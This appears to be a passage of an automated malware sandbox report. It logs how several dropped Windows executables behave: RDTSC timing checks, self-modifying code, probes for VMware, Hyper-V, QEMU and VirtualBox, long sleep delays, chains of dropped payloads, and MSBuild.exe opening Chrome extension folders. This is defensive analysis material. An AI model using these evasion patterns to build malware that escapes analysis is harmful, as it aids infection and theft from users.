Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0DAC second address: 54A0DC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C28988h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: 54A0DC8 second address: 54A0E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr fs:[00000000h], eax 0x00000010 jmp 00007F58F53CD399h 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 jmp 00007F58F53CD38Eh 0x0000001d mov eax, dword ptr [esi+10h] 0x00000020 jmp 00007F58F53CD390h 0x00000025 test eax, eax 0x00000027 jmp 00007F58F53CD390h 0x0000002c jne 00007F5967C1C283h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Special instruction interceptor: First address: B12C9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Special instruction interceptor: First address: B103A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Special instruction interceptor: First address: CC0F53 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Special instruction interceptor: First address: B72C9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Special instruction interceptor: First address: B703A6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Special instruction interceptor: First address: D20F53 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Special instruction interceptor: First address: 994D89 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Special instruction interceptor: First address: 994E8A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Special instruction interceptor: First address: B3D7B2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Special instruction interceptor: First address: B668AB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Special instruction interceptor: First address: BCA4F7 instructions caused by: Self-modifying code
Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Code function: 10_2_054C094D rdtsc 10_2_054C094D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4398
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4018
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3972
Source: C:\Users\user\AppData\Local\Temp\22.exe Window / User API: threadDelayed 412
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\7b35p_003[1].exe
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ssisd.sys
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10352670101\466f8e521c.exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10001960101\gron12321.exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\v7942[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\please18[1]
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\alex1dskfmdsf[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10352680101\d6a397c01b.exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\crypted.54[1].exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10041870101\f4d01cf3f8.exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\gron12321[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10041600101\please18.exe
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10041590101\crypted.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10352690101\7b35p_003.exe
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe API coverage: 3.9 %
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe API coverage: 9.9 %
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe API coverage: 9.9 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6748 Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5952 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3000 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7828 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3804 Thread sleep count: 175 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3804 Thread sleep time: -350175s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5300 Thread sleep count: 124 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5300 Thread sleep time: -248124s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7280 Thread sleep count: 286 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7280 Thread sleep time: -8580000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5304 Thread sleep count: 173 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5304 Thread sleep time: -346173s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3280 Thread sleep count: 188 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3280 Thread sleep time: -376188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5488 Thread sleep count: 172 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5488 Thread sleep time: -344172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3488 Thread sleep count: 164 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 3488 Thread sleep time: -328164s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5164 Thread sleep count: 199 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5164 Thread sleep time: -398199s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5276 Thread sleep count: 180 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 5276 Thread sleep time: -360180s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7280 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7464 Thread sleep time: -150000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7468 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\22.exe TID: 7612 Thread sleep count: 412 > 30
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe TID: 3356 Thread sleep count: 171 > 30
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe TID: 3356 Thread sleep time: -5130000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe TID: 3356 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00E4DBBE
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E1C2A2 FindFirstFileExW, 0_2_00E1C2A2
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E568EE FindFirstFileW,FindClose, 0_2_00E568EE
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E5698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00E5698F
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E4D076
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E4D3A9
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E59B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00E59B2B
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F4F2F4 FindFirstFileExW, 22_2_00007FF748F4F2F4
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F4F478 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 22_2_00007FF748F4F478
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879F2F4 FindFirstFileExW, 25_2_00007FF73879F2F4
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879F478 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 25_2_00007FF73879F478
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DE42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00DE42DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: powershell.exe, 00000005.00000002.912679466.0000000008450000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:06e6
Source: chrome.exe, 0000002D.00000002.1846093562.00005B0401778000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus PipesP
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical ProcessormuiEG
Source: MSBuild.exe, 00000018.00000002.1572221480.0000000001275000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWG$
Source: 466a80d633.exe.21.dr, 01ea7855d3.exe.43.dr Binary or memory string: XQEmU
Source: 466a80d633.exe, 00000032.00000003.1740940032.0000000004D60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: QEMUU
Source: apple.exe, 0000001C.00000002.1563949033.00000000065F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: MSBuild.exe, 00000018.00000002.1572221480.0000000001275000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000018.00000002.1571634668.000000000123C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: chrome.exe, 0000002D.00000002.1745063061.000001F7D589B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor$S,
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1696457795.000001F7D95E5000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1700413896.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1705420225.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1692991767.000001F7D95EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partitiony
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1696457795.000001F7D95E5000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1700413896.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1705420225.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1692991767.000001F7D95EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partition
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor,
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1693723887.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root PartitionD
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1696457795.000001F7D95E5000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1700413896.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1705420225.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1692991767.000001F7D95EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Servicex
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000A.00000002.957958679.00000000015CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: chrome.exe, 0000002D.00000002.1745063061.000001F7D589B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition[
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus PipesJ
Source: chrome.exe, 0000002D.00000002.1743321721.000001F7D1C36000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid Partition
Source: powershell.exe, 00000005.00000002.910102296.0000000007262000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y=
Source: powershell.exe, 00000008.00000002.990342238.0000015533E4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000B.00000002.996513045.0000000000C98000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, rapes.exe, 0000000C.00000002.991548172.0000000000CF8000.00000040.00000001.01000000.0000000F.sdmp, 466a80d633.exe, 00000032.00000002.1925697033.0000000000B18000.00000040.00000001.01000000.0000001C.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: chrome.exe, 0000002D.00000002.1745063061.000001F7D5940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V aivsyofviydytbq Bus
Source: chrome.exe, 0000002D.00000002.1846617251.00005B0401950000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mouse
Source: chrome.exe, 0000002D.00000003.1693982103.000001F7D95FC000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1692991767.000001F7D95FC000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1747651599.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1696457795.000001F7D95E5000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1700413896.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1705420225.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid Partition
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: powershell.exe, 00000008.00000002.990863464.000001553406F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1693723887.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 0000002D.00000002.1745063061.000001F7D589B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: chrome.exe, 0000002D.00000002.1745063061.000001F7D589B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: chrome.exe, 0000002D.00000002.1841155266.00005B0401474000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=0b784c52-0db5-4ac0-abda-f47798123e96
Source: powershell.exe, 00000008.00000002.990342238.0000015533E4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: chrome.exe, 0000002D.00000002.1745063061.000001F7D589B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Hypervisor Root Partition
Source: chrome.exe, 0000002D.00000003.1657767128.00005B04002F4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware20,1(
Source: chrome.exe, 0000002D.00000003.1700413896.000001F7D95E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space 